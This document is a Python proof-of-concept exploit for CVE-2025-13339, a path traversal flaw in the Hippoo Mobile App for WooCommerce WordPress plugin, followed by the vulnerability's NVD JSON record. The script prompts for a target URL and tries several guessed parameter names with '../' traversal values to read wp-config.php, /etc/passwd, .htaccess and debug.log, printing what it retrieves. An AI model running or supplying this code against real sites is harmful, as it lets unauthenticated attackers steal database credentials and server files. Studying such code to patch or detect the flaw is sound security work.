CVE-2025-13339

import requests # CVE-2025-13339 PoC - Path Traversal in Hippoo plugin # Target: WordPress site with Hippoo Mobile App for WooCommerce <= 1.7.1 def exploit_path_traversal(target_url, file_path='../../../../wp-config.php'): """ Exploit path traversal vulnerability to read arbitrary files Args: target_url: Base URL of the WordPress site file_path: Path to traverse (relative path to target file) Returns: Content of the requested file """ # Try different parameter names commonly used in path traversal params_list = [ {'template': file_path}, {'file': file_path}, {'page': file_path}, {'hippoo_file': file_path} ] for params in params_list: try: response = requests.get( target_url, params=params, timeout=10, verify=False ) # Check if we got valid content (not error page) if response.status_code == 200 and '<?php' in response.text: print(f'[+] Success with params: {params}') return response.text elif response.status_code == 200: print(f'[*] Got response with params: {params}') print(f'[*] Content length: {len(response.text)}') except requests.RequestException as e: print(f'[-] Error with params {params}: {e}') return None def main(): target = input('Enter target URL (e.g., http://target.com): ').strip() # Read wp-config.php print('[*] Attempting to read wp-config.php...') content = exploit_path_traversal(target, '../../../../wp-config.php') if content: print('\n[+] wp-config.php content:') print(content[:2000]) # Print first 2000 chars # Try to read other sensitive files files = [ '../../../../etc/passwd', '../../../../.htaccess', '../../../wp-content/debug.log' ] for f in files: print(f'\n[*] Attempting to read: {f}') result = exploit_path_traversal(target, f) if result and '<?php' in result or result and 'root:' in result: print(f'[+] Content preview: {result[:500]}') else: print('[-] Exploitation failed. Target may not be vulnerable.') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-13339", "sourceIdentifier": "[email protected]", "published": "2025-12-10T05:16:02.200", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.1 via the template_redirect() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3412701/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/06900b4b-6607-4b25-b4bc-2e2906160421?source=cve", "source": "[email protected]"}]}}